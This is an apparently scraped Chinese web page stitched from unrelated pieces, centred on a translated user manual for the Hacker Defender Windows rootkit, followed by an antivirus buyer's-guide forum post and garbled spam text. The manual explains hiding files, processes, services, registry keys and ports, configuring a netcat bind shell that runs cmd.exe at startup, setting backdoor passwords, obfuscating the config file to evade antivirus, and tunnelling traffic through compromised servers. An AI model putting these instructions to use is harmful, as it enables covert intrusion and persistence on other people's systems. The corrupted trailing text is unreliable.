C和Go语言啊
bot端采用纯C写的
CNC采用GO语言
至于Mirai DDoS的工具源码,除了scanListen,其余都是C哦。
是重建锡安的源代码,这段代码可以让他挑选20个人,这电影里说了,按照设计,neo找到的将是一个升级的程序代码,它将升级neo到一个更新的版本,neo此时就变成了一个类似于xp sp3之类的升级包,他将完成整个matrix的升级,成为旧版母体的第七代,新版母体的第一代neo,从此他将直接受工程师控制,为整个的母体添加新的变量,因为工程师作为人,是无法再平衡等式的,所以smith将受到压制,这也是唯一可以救trinity的方法,但是,整个锡安只有20个人能活下来。
懂ASP的话删除 挂马语句,如果不懂干脆用备份覆盖,并及时打上安全补丁和漏洞以防黑客再次入侵!
Hacker defender 使用
=====[1,目录]==============================================
1.
目录
2. 概要
2.1 关于
2.2 申明
3. 使用说明
4. Ini文件说明
5.
Backdoor
5.1 Redirector
6. 技术支持
6.1 版本
6.2
钩子API函数
6.3 已知的 bugs
7. Faq
8. 文件
=====[ 2.
关于]================================================
Hacker defender
(hxdef)是一个使用于Windows NT 4.0, Windows 2000 以及Windows
XP操作系统的一个NTROOKIT,它也能运行于之后的基于NT的操作系统。主要代码是由DELPHI
6完成。新的功能使用汇编书写。驱动代码由C完成。后门和redirector客服端大部分使用 Delphi 6完成。
=====[ 2.1 概要
]=============================================
程序的主要功能是在所有运行中的进程中重写分割内存,重写一些基本的模块改变进程的状态,它几乎能够改写所有不影响系统稳定和正在运行中的进程。
程序能够完全隐藏,现在能够做的有隐藏文件、进程、系统服务、系统驱动、注册表的键值和键、开放端口以及虚构可用磁盘空间。程序同时也在内存中伪装它所做的改动,并且隐蔽地控制被隐藏进程。程序安装后能构造后门、注册表、系统服务,构造系统驱动。其本身的后门技术允许其植入
redirector。
=====[ 2.2
申明]====================================================
本项目1.0.0版本是开发源代码。
使用Hacker
defender所造成的后果作者本人概不负责。
=====[ 3. 用法
]==================================================
一个使用hxdef的简单例子:
hxdef100.exe [inifile]
或者
hxdef100.exe [switch]
直接执行EXE文件,不带任何的参数时候,默认的inifile文件为程序名.ini
。
当你执行hedef100不指定ini文件,或者你以参数模式运行时候,默认的文件是
hxdef100.ini。
下面的参数是有效的:
-:installonly - 只安装服务,不运行
-:refresh - 从INI文件中更新设置
-:noservice - 正常运行不安装服务
-:uninstall -
移除hxdef删除所有运行的后门连接,同时停止hxdef服务
例如:
hxdef100.exe
-:refresh
Hxdef拥有默认INI文件,但是我们强烈的推荐你建立自己的ini文件。关于ini文件的介绍可以看第4部分ini文件部分。
参数
-:refresh and -:uninstall
来源于本来的EXE文件。这就意味这你只要知道hxdef的运行路径和EXE名,就能够改变它的设置或者进行移除工作。
=====[ 4. Ini文件
]============================================
ini文件必须包含了9个部分: [Hidden Table],
[Root Processes], [Hidden Services], [Hidden RegKeys], [Hidden RegValues],
[Startup Run], [Free Space], [Hidden Ports]和[Settings]。
在 [Hidden Table],
[Root Processes], [Hidden Services]和[Hidden RegValues]
中能够使用*代替后面的字符,星号仅仅使用于字符的后面,任何在*之前的都是无效的。所有的在字符之前和之后的空格也是无效的。
例如:
[Hidden
Table]
hxdef*
将开始隐藏所有在Hidden
Table中以"hxdef"开头的文件、文件夹和系统进程。
在该文件列表中的所有文件和文件夹都将在文件管理器中消失。在这个列表中的程序也会在任务管理器中被隐藏。必须确保主要文件,INI文件,你的后门文件和驱动文件被包含在列表中。
在程序列表中的主进程对感染具有免淤能力,你只能利用这些主程序才能看见隐藏的文件,文件夹和程序。所以,主进程是为rootkit管理员所使用的。
由服务和驱动所组成的Hidden
Services列表将会隐藏在数据库中的安装服务和驱动。rootkit主程序的服务名默认为HackerDefender100,rootkit驱动的驱动名默认为HackerDefenderDrv100。它们两者都可以通过ini文件进行修改。
Hidden
RegKeys中列出的注册表键值将会被隐藏,Rootkit在注册表中有四个键值:默认的是HackerDefender100,
LEGACY_HACKERDEFENDER100, HackerDefenderDrv100, LEGACY_HACKERDEFENDERDRV100
如果你要重新命名服务名或者驱动名,你需要在列表中做相应的改变。
开始2个键值是和你的服务据用相同名字的,接下来的键值是LEGACY_名字。例如,如果你改变你的服务名称为BoomThisIsMySvc
,那么在注册表中,应该是这样表示的,LEGACY_BOOMTHISISMYSVC。
在Hidden
RegValues列出的注册表的值将会被隐藏。
Startup
Run列表中列出的是rootkit程序运行之后的自启动程序。这些程序和ROOTKIT具有一样的特权。程序名和它后面的参数以?分开。不要使用"字符,程序将会在用户登陆以后终止,在用户登陆以后可以使用一般和常见的方法。你可以使用下面这些快捷方式。
%cmd%标准系统的shell和路径
%cmddir%标准系统的shell文件夹
%sysdir%
- 系统文件夹
(e.g. C:\winnt\system32\)
%windir% -
标准系统文件夹
(e.g. C:\winnt\)
%tmpdir% - 临时文件夹
(e.g. C:\winnt\temp\)
例如:1)
[Startup Run]
c:\sys\nc.exe?-L -p
100 -t -e cmd.exe
nc-shell将会在rootkit运行以后监听100端口
2)
[Startup
Run]
%cmd%?/c echo Rootkit started at %TIME%
%tmpdir%starttime.txt
将rootkit启动时间保存在系统临时文件夹夹starttime。Txt文件。
(%TIME%仅仅运行于Windows2000以上的操作系统。)
Free
Space中列出的驱动硬盘名和容量大小是你想增加的硬盘,它的格式是X:NUM,其中X表示磁盘驱动器的名称,NUM表示你要增加的磁盘的容量。
例如:
[Free
Space]
C:123456789
这将在C盘增加大约123M的磁盘空间。
Hidden
Ports中列出的是你需要隐藏程序的端口,比如使用OpPorts, FPort, Active Ports, Tcp
View等的程序,它最多拥有2行。第1行的格式是TCP:tppport1,tcpport2,tcpport3
,第2行的格式是UDP:udpport1,udpport2,udpport3 ...例如:
1)
[Hidden
Ports]
TCP:8080,456
这将隐藏2个TCP端口:8080和456
2)
[Hidden
Ports]
TCP:8001
UDP:12345
这将隐藏2个端口:TCP的8001和UDP的12345。
3)
[Hidden
Ports]
TCP:
UDP:53,54,55,56,800
隐藏5个端口,都为UDP端口:53,54,55,56,800。
Settings包含了8个值:Password,
BackdoorShell, FileMappingName, ServiceName,ServiceDisplayName,
ServiceDescription, DriverName 和
DriverFileName。
名。
16位字符的Password被用于后门链接和转向,密码能根据短一些,余下的用空格代替。
BackdoorShell是复制于系统的SHELL文件,它被后门创建于一个临时的目录下。
FileMappingName,当钩子进程被存储时,用于共享内存。
ServiceName是rootkit服务
ServiceDisplayName为rootkit显示的服务
ServiceDescription位rootkit的服务描述
DriverName以hxdef驱动命名
DriverFileName以hxdef驱动文件命名
例如;
[Settings]
Password=hxdef-rulez
BackdoorShell=hxdef?.exe
FileMappingName=_.-=[Hacker
Defender]=-._
ServiceName=HackerDefender100
ServiceDisplayName=HXD Service
100
ServiceDescription=powerful NT
rootkit
DriverName=HackerDefenderDrv100
DriverFileName=hxdefdrv.sys
这就意味着你的后门密码为hxdef-rulez,后门将复制系统shell文件(通常是CMD.EXE)为hxdef?.exe到临时目录。共享内存将变为"_.-=[Hacker
Defender]=-._",服务名为"HackerDefender100",它显示的名称为"HXD Service 100",它的描述为"poweful NT
rootkit",驱动名为"HackerDefenderDrv100",驱动将被存储于一个叫做"hxdefdrv.sys"的文件中。
扩展字符|,
, , :, \, / 和 "在所有的行中都会被忽略,除了[Startup Run], [Free Space] 和 [Hidden
Ports] 项目和在 [Settings] 中first =
character后面的值。使用扩展字符能然你的INIFILE文件摆脱杀毒软件的查杀。
例如:
Example:
[Hidden
Ta/"ble]
h"xdef"*
和下面的是一样的。
[Hidden
Table]
hxdef*
更多的例如可以参照hxdef100.ini
和hxdef100.2.ini文件。
所有的在ini文件中的字符串除了那些在Settings 和 Startup
Run中的,都是无效的。
=====[ 5. Backdoor
]=========================================
Rootkit程序
Hook了一些API的功能,连接接收一些来自网络的数据包。如果接收的数据等于256个字节,密码和服务被确认,复制的SHELL被临时创建,这种情况建立以后,下一次的数据接收被重定向到这个SHELL上。
因为rootkit程序
Hook了系统中所有进程,所有在服务器上的TCP端口都将变为后门。例如,如果目标主机开放了提供HTTP服务的80端口,这个端口也能作为一个有效的后门。例外的是这个开放端口的进程不会被Hook,这个后门仅仅工作于服务器的接收缓冲大于或者等于256个字节。但是这个特征几乎适合于所有标准的服务,像IIS,APACHE,ORACLE等。后门能够隐藏是因为所有的数据都通过系统上面提供的服务转发。所以你不能使用一些简单的端口扫描软件找到它,并且它能轻易的穿过防火墙。
在测试发现IIS服务过程中,HTTP服务不能记录任何的连接日记,FTP和SMTP服务器仅仅能记录结束的断开连接。所以,如果你运行hxdef在有IIS
Web服务的服务器上面,HTTP端口跟你是连接机器使用的后门的最好端口。
如果你想连接后门的话,你将不得不使用使用一些特别的客户端,程序bdcli100.exe就是被用于如此的。
用法:bdcli100.exe
host port password
例如:
bdcli100.exe 80
hxdef-rulez
连接服务器使用默认的密码。客户端1.0.0版本不兼容其他老的版本。
=====[
5.1 Redirector
]==========================================
Redirector是基于后门技术。第一个连接包和后门连接一样。这就意味着你能使用相同的端口。下一个包是仅仅为Redirector特殊的包,这些包由基于运行用户电脑的重定向器生成.第一个重定向的包连接特定的目标主机和端口。
Redirectors的设置保存在与EXE文件同名的INI文件中(所以默认的是rdrbs100.ini)。如果这个文件不存在,那么在EXE文件运行的时候它会自动建立一个。最好不要额外的修改INI文件。所有的设置都可以在console中进行改变。
当ROOTKIT被安装时,如果我们需要使用服务器上面的redirectors功能,我们首先要在本地运行程序。在控制台上我们可以在有HXDEF的服务器上面建立一个映射端口路由。最后我们连接本地端口并且转换数据。转向的数据被rootkit的密码加密。在这个版本中连接的速度被限制在256K左右。在这个版本中redirectors并不适合于高速连接。Redirectors也会受到安装有rootkit的服务器的限制,而且Redirectors仅仅使用TCP协议连接。在这个版本中Redirectors
base有19条命令,他们并不是非常的敏感。关于功能的详细描述可以使用HELP命令。在Redirectors
base启动时,startup-list中的命令也被执行。startup-list中的命令可以用使用SU启动的CMD进行编辑。
Redirector区分于2种连接类型(HTTP和其他)。如果连接是其他类型的,数据包将不会被改变。如果是HTTP类型,在HTTP文件头的HOST参数将会改变为目标服务器。一个base的最大Redirector数量是1000。
Redirector仅仅适用于NT结构,只有在拥有图标的NT程序下你才能使用HIDE命令隐藏控制台。只有在NT下才能无声无息的运行,没有数据输出,没有图标,仅仅执行startup-list中的命令。例子:1)得到端口映射信息
MPINFO
No mapped ports in the
list.
2)增加MPINFO命令到startup-list并且得到startup-list中的命令。
SUADD
MPINFO
sulist
0) MPINFO
3)使用HELP命令。
HELP
Type HELP COMMAND for command details.
Valid commands
are:
HELP, EXIT, CLS, SAVE, LIST, OPEN, CLOSE, HIDE, MPINFO, ADD,
DEL,
DETAIL, SULIST, SUADD, SUDEL, SILENT, EDIT, SUEDIT,
TEST
HELP ADD
Create mapped port. You have to specify domain
when using HTTP
type.
usage: ADD LOCAL PORT MAPPING
SERVER MAPPING SERVER PORT
TARGET
SERVER
TARGET SERVER PORT PASSWORD [TYPE] [DOMAIN]
HELP
EXIT
Kill this application. Use DIS flag to discard unsaved data.
usage: EXIT
[DIS]
4)增加端口映射,我们在本地100端口进行监听,ROOTKIT安装在服务器200.100.2.36的80端口上,目标服务器是端口。,rootkit的密码是bIgpWd,连接类型HTTP,目标主机()我们知道它的IP地址是216.239.53.100。
ADD 100
200.100.2.36 80 216.239.53.100 80 bIgpWd HTTP
ADD命令可以不加任何参数的运行,在这个例子中我们要求每一个参数都要分开。
5)现在我们再使用MPINFO检查一下映射端口
MPINFO
There are 1 mapped ports in the list. Currently 0 of them
open.
6)列举端口映射表:
LIST
000)
:100:200.100.2.36:80:216.239.53.100:80:bIgpWd:HTTP
7)一个端口映射的详细描述:
DETAIL
Listening on port: 100
Mapping server address:
200.100.2.36
Mapping server port: 80
Target server address:
216.239.53.100
Target server port: 80
Password: bIgpWd
Port
type: HTTP
Domain name for HTTP Host:
Current state:
CLOSED
8)在没有密码的情况下,我们能在端口映射服务器200.100.2.36上测试rootkit是否已经安装(但是如果我们能确认它这样做就不再需要)
TEST 0
Testing 0) 200.100.2.36:80:bIgpWd –
OK
如果测试失败则显示:
Testing 0) 200.100.2.36:80:bIgpWd -
FAILED
9)在我们没使用之前端口仍然是没有开放的。我们不得不使用OPEN命令打开它,当端口开放时,我们也能使用CHOSE命令关闭端口。我们能使用标志符ALL应用这些命令在列表中的所有端口,这个过程可能需要一段的时间。
OPEN 0
Port number 0 opened.
CLOSE 0
Port number 0
closed.
或者 OPEN ALL
Port number 0
opened.
10)要保存当前的设置和列表我们可以使用SAVE命令,将保存所有的设置到ini文件中。(保存也会通过命令EXIT执行,而不需要DIS标志)
SAVE Saved
successfully.
开的端口能够转换我们需要的所有数据。限制你能打开你喜欢的浏览器输入网址,如果没有什么问题的话,你会看见打开的是的主页。
第一个数据包跟你会延迟5秒钟左右,但是其他的限制仅仅取决于服务器的速度,根据这个版本的转向技术,你联网的速度大约在256K左右。
=====[
6.
技术发行]========================================
这部分包含了一些对于普通用户无关紧要的信息。这部分可能适合所有的测试者和开发人员阅读
删除就可以了。挂的黑链,想彻底删除,你得找出shell在那里。然后删除掉,修复漏洞。
360垃圾,别用
avast是个好杀软。免费的哦,可以只装它。
关于杀软,可以看看我的这篇文章。
我在卡饭论坛泡了一阵子,自视对杀软比较了解。按我的经验,杀软并不万能,不可能查出所有的毒。杀软更不会有最好。很多杀软都很好的。杀软各有特点,各有优缺点,也各有优势与劣势。总之,还是安全意识和电脑知识最重要,而且要安全应该杀软、防火墙、HIPS(新手可用智能hips)、沙盘一起装。(有点多。。。其实安全习惯好的话不用这么多的,太累。)另外其实hips比杀软管用,还省资源。。。当然也有毒能过他。另外,也可以试试虚拟机、硬盘还原卡、影子系统之类的,不过也有毒能穿过他们的,所以安全软件还是必须的。还有,想了解杀软请去专业杀软论坛(推荐卡饭论坛),可以认识很多世界各地的好杀软。而网上很多文章要么是错的、要么是枪文、要么已过时。(比如5大引擎的那篇误导人的文章,杀毒引擎是杀软的核心,所以很多杀软都是自己的引擎!而且很多引擎都很好!),网上的杀软评测、排名也别信。哪怕是VB、AV-c、AV-test这些权威机构的评测也只是实验室中的东西,只是参考而已,而且他们的测试方法也不是没问题。而且基本每次测试结果排名都不一样的。那个toptenreview更不成,只是性价比排名而已(就是说bitdefander第一那个)。所以说,杀软根本没排名!!也没人敢排,找骂。。。
杀软一般人都喜欢高侦测率的(其实很无聊),目前有6个:
1、卡巴(俄罗斯杀软):卡巴就不用多说了,超强,以前的侦测率超级的高,独孤求败!现在因为针对他的免杀多了所以侦测率比以前低了。卡巴斯基博士和solomon博士对早期杀软有重大贡献。他们做的那2个杀毒引擎备受好评。卡巴的引擎被很多杀软使用,solomon曾是欧洲最大的杀软公司,后被麦咖啡收购,现在麦咖啡就是用solomon的引擎。回来说卡巴,kis(卡巴的那个互联网安全套装)有杀软、防火墙、hips、沙盘等,而且都很棒,很难得!立体防御非常棒!因为有hips,所以免杀虽多也不用太怕。但新版2010资源占用较大,虽然其实有几个旧版本挺小的。。。卡巴免杀多,不过这么多免杀还能保持高水准也不易了。。网上到处是key,所以与免费杀软无异。
2、小红伞(avira antivir、德国杀软):有免费版、资源占用小、误报很低,并没人说的那么高,侦测率超高、监控灵敏、扫描速度极快,启发式查毒做的很棒!是杀软中启发式最好的之一。有最好的静态启发式。可以很好地查未知毒。当然hips也可以防未知毒,而且更好。可惜红伞还没有hips,据说快有了。红伞只有英文版。。。。但那点英文并不难。而且网上有汉化版的。小红伞+comodo的防火墙和hips是很经典的组合,人称红豆组合,而且完全免费!不过有些人可能用不惯comodo。也可以用别的防火墙、HIPS的,很多好防火墙、HIPS都免费哦。
3、G data AVK(德国杀软):avast!、bitdefander双引擎,自然侦测率超高.另外avk2006因为用的卡巴和bitdefander的引擎,比新版本还出色。。。很受追捧。
4、Trustport(捷克杀软):10引擎怪物,5个买的,5个自己的小引擎。自然侦测率超高,但资源占用超级大,而且5引擎间似乎配合有些问题。。。(不要迷信多引擎,侦测率未必比单引擎的高,而且资源占用较大,不过多引擎杀软好像越来越多了。。)
5、Ikarus(奥地利杀软):误报稍高、只能特征码查毒,没启发式,对新病毒不佳。缺点不少。。但是--侦测率超级的高。。。
6、a-squared(奥地利):Ikarus的OEM,加上自己的引擎。有免费版,但免费版只能扫描,无监控。anti-malware版还加上了自己的智能hips,mamutu。很棒!但小心误报。
各有特色,自己选吧,另外国产的费尔托斯特也很棒。至于其他的杀软,特别是国外的知名杀软(如诺顿、nod32、AVG、avast、 bitdefander、F-Secure),侦测率也没和他们差太多。(顺便说下F-Secure,它也是多引擎杀软,以买的引擎为主,辅以几个自己的或买的小引擎。侦测率很不错。以前买过卡巴的旧引擎,(最新引擎不会卖的),现在它改用BitDefender了,因为买不起卡巴了。。。)
再列几个防毒好的,也就是实时扫描侦测率不错、监控严密、全面、到位,而且最好有hips或自定规则的。(杀软带的多是智能hips)
大杀软公司、做企业杀毒的那几个都成:诺顿(企业版是赛门铁克,还有诺顿现在资源占用变很低了哦)、麦咖啡(它的企业版能像hips一样自定规则,而且自己也有hips了)、趋势、CA、sophos等,另外做家庭杀毒的卡巴、panda、F-secure等的防御也很好(而且也是很大的公司)。
另外国产的东方微点也很不错,但我觉得它不是杀软,本质是智能hips。所谓的主动防御、行为分析其实就是智能hips,只对危险行为(先后调用了某些危险的内核native API)报警,而不是像hips调用了危险API就报警。(因为有事先写好的内置的规则)(hips能手动写规则,写好了能很安静、安全)(以上说的主动防御是狭义的主动防御,指行为分析。广义的主动防御指所有不依赖特征码,能查未知毒的查毒方法。比如广谱特征码、启发式查毒、HIPS)
还有很多杀软防毒也不错,就是没带hips。其实很多杀软都不带的,因为hips、防火墙都该是另装的,自己装就成了,杀软不管。也就是说,一般侦测率不错的杀软,防毒也好,只要他监控严格全面。至于hips自己可以另装专业的hips。另外,越来越多的杀软要加HIPS了,看来是大势所趋啊。杀软+防火墙+HIPS,有的还有沙盒,组成全面的防御,的确是很好的。
还有,虽然很多软件也自称有主动防御,但只是炒概念而已,并不是智能HIPS。而有的杀软虽然带智能HIPS,但水平较差。只有少数杀软的HIPS能达到专业HIPS的水平的。
再列几个有官方终身免费版的(免费杀软并不差!也就是会少几个不重要的功能。国外很多好杀软都早就有给家庭用户的免费版了,而且微软出免费杀软后,其他厂商被逼的杀软免费、降价,杀软免费好像已是大势所趋):avast、小红伞、avg、a-squard、mse(微软做的,不错)、360杀毒等(外行做杀软,用的是bitdefander的阉割版引擎和病毒库,不怎么样,不推荐)
再列几个资源占用小的:avast、小红伞、nod32(以前的版本。nod32的启发式很棒!是最好的动态启发式。但其他方面。。。)、MSE、360杀毒、费尔等.
再来列几个国产的:东方微点、费尔托斯特安全。瑞星、金山、江民还是算了。。。。另外,趋势是台湾的一个人在美国建的,能算半个国产吧。现在趋势已经是大型跨国公司了,了不起,令人骄傲啊。不过个人认为杀毒能力挺一般的。。。。另外,CA和趋势很像,也是大公司,是个中国人和人一起在美国建的。
还有,不用担心杀软不免费,网上有注册机,也有key。。。。
但请保护知识产权,尽量购买正版!!研发杀软是很累的!杀软公司很不容易的!他们为我们做了很多。。。。
还有,澄清几个错误想法:
1、据传诺顿、麦咖啡有部分微软windows源代码,不知真假,此已无法考证。但Vista的源代码微软没给任何人,这是肯定的,windows7也一样。所以现在杀软都一样了。其实mse绝对有源代码。。。。。也许以后他会很强!顺便说下,有没有源代码和进系统内核没关系,很多病毒都能进系统内核,他可没有源代码。
2、有些杀软是军方和政府用的,但这不能说明什么,军方也有普通电脑嘛。。。但放机密的电脑和指挥用电脑都不是pc机,不是windows系统,不联网,也不用杀软!!军方和政府用什么杀软多是出于政治因素(主要用国产软件)和公关。(所以中国多用瑞星。。。俄罗斯用dr.web,卡巴也用)这么随便那电脑会不会不安全呢?没事,军队一向纪律严明,也不随便上网,而且有专家,不怕的。而且,他们安全不只靠杀软的,杀软有局限性的,他们还会用 ips、IDS之类的,有一整套防御体系。
同样的,企业杀软也不是就比个人的好,企业版要的是可管理,要防护好,求稳,不能误杀,所以侦测率往往不高。而且不会像个人版贸然使用新技术。所以好多新技术都没有。。。当然,企业也是不怕中毒的,大企业都管理严格,不让职工乱动电脑,再加上有专业网管,所以不怕。同样的,他们安全也不只靠杀软的,他们也会用ips、IDS之类的,有一整套防御体系。
另外,其实好多机构,包括政府,用的都是企业杀软,至少是杀软的企业版、网络版,因为他们和企业的情况是很类似的。
3、DR.web(大蜘蛛)不是什么俄罗斯国家科学院开发的,就是个人做的,那人是卡巴斯基博士的好友--Igor Danilov.它也有商业化,曾经占俄罗斯市场95%,后来被卡巴超了。。。DR.web的技术很不错,Igor Danilov是很有名的天才,但也没网上吹的那么强,脱壳也就中上等,碰到一些强毒也还是会查不出。它病毒库有些小,所以侦测率不太高,但也够用,就是扫描实在太慢,受不了,俄罗斯军方居然能忍,不怕误事吗?说了不少缺点,也说说优点吧,它的修复能力很不错,要是中毒后,它能尽力把一些能清的毒清掉,让文件恢复,有时能让系统得救。所以比较推荐它的免费扫描器Dr.web cureit!。另外,还有几款杀软的修复能力也不错哦。但杀软的修复能力普遍还是都应该再努力加强些的,现在的修复、清毒能力都还不够。
4、nod32据说可能是微软用了4年,但只是某些地方用了一些,微软用诺顿、咖啡比较多(同在美国,有合作)。当然关键部门的安全就要靠微软内部的高手们了。至于说五角大楼用nod32就纯属胡扯了,美国军方用斯洛伐克杀软?疯了?
5、网上有个所谓测杀软监控的测试,就是复制一段代码进记事本那个。那个测试只是测监控是否启动,与好坏无关。有的杀软是不监控记事本的,它不是程序,不会执行,不会传播病毒,没必要监控。也有的杀软监控是在读或写文件时再扫描,以节省资源,所以只复制代码时不报也很正常。
6、木马是广义病毒的一种,杀软可以杀,不用另配杀木马的。
7、病毒分国界?不分!病毒能在极短时间内传到国外的。国外杀软可以很好地杀中国的毒。但是每个国家也的确有他特殊的网络环境,特别是中国。。。。所以国外杀软不可能全杀。但中国的杀软技术不成,好多毒杀不出。所以我还是推荐用国外的杀软,可配些国产的安全辅助工具或找国产杀软做辅杀。(顺便一提,卡巴是本地化最好的国外杀软,全面进军中国市场。在中国有病毒中心,已与国产杀软无异,但也因此免杀会多。。。)(另外,有意思的是,国外的杀软有些不太擅长中国毒,有些则国内外通杀。。。神奇。。。)
8、关于误杀,误杀是难免的,但主流杀软误杀都不敢多的。有些国外杀软可能会误报甚至杀掉某些国产软件,因为本地化不好,没把那些国产软件加进白名单。但也不能全怪他们,因为国内有些软件很流氓,跟木马或间谍软件似的,窃听用户、盗取数据,或者乱发广告,不杀才怪。
9、你敢裸奔的话以中国的计算机环境不出3天你就得中毒。你不怕,大不了全盘格式化或Ghost还原?有些毒能进BIOS、CMOS甚至更离谱的地方,你格10遍盘也没用!ghost也是会被毒破坏的。老老实实装安全软件吧。
10、防火墙只是用来防黑客网络攻击的,不是防毒的,也不扫描网络流量中是否有毒(它没有病毒库啊)。防毒、监测网络流量内容是杀软干的事 。
总之杀软没有最好,只有最适合自己和自己的机器的。安全意识和电脑知识最重要!选杀软也要综合考虑侦测率、防御、资源占用、兼容性、稳定性、速度等。
还有,杀软最好别选太有名的,免杀多,卡巴就因为免杀多所以侦测率低了。免杀很要命啊,熊猫烧香就是威金病毒加了个壳(加壳是免杀常用手段之一),很多杀软就挂了。。。。当然有名的杀软也有他强的地方。。。要综合考虑。
另外杀软可以装2个,但有些杀软之间冲突,别乱试。不推荐装2个,不见得能安全多少,还占资源,还可能冲突。可以另装个绿色版不带监控的杀软,网上有人做。还有些杀软有免费的纯扫描器给人用,比如a-squared的免费版,大蜘蛛的dr.web cureit!,麦咖啡也有。当然,你也可以装多个杀软,然后关几个的监控。
就说这么多,自己选吧
(百度会员lkygood原创,欢迎将此文章转发。算是做科普了)
人尾月场是淘特新人尾月入端购置 的流动场景,页里运动 不只流质年夜 ,且支撑 新人尾月红包抵扣,流质转移下;商品正在搜刮 战尾页推举 异步添权,坑位有限,尽快报名。1、报名空儿一、报名空儿:历久 有用 二、运动 空儿: 二0 二 二年 三月 一 七日 二0:00:00-历久 有用 备注:会由于 仄台...
第 一页 剧情吧工夫 : 二0 一 三- 一0- 二 六 二 三: 四 五:0 八 已婚妻第 一散剧情先容 繁荣 都会 天天 车流穿越没有息,田飞的事情 便跟乡市的车流同样,天天 皆正在反复 运做,一地正午 他去到私司持续 事情 ,王司理 一个德律风 把他唤至办私室,待田飞走出去,王司理...
《魂魄 功男父》受到宅男冷捧 奥秘团队赞助 鹏飞姐入军文娱圈 二0 一 六/ 一0/ 四 一 四:0 二: 一 一 做者:W 二-zhuxi…起源 :伊秀文娱网收集 红人腾讯“鹏飞姐”的尾秀《魂魄 功男父》是一部异常 偶幻的片子 ,讲述了实际 版鹏飞姐单重魂魄 的奥妙 小说,该片子 遭到很多 宅男...
寄熟兽高领插件的罪用列表Creation Date: 二0 一 九-0 五- 一 六T0 七: 一 二: 三0Zpython 三 arjun.py -u ://api.example.com/endpoint --get 最近 , 三 六0 威胁谍报 中间 宣布 了《寰球高...
运用Nginx作Web办事 器进程 外,碰着 过如下几个答题:一、nginx封动掉 败 一systemctl start nginx.service封动nginx掉 败,报错疑息以下:Starting nginx: nginx: [emerg] bind() to 0.0.0.0:AV女优* fai...
第一步:确认网站谢封REWRITE规矩 正常有二种情形 :i.apache装置 的时刻 曾经包括 rewrite功效 ii.后绝设置装备摆设 的时刻 新加添mod_rewrite.so。那种情形 须要 正在httpd.conf文献外修正 设置装备摆设 封动正在conf目次 高httpd.conf外找...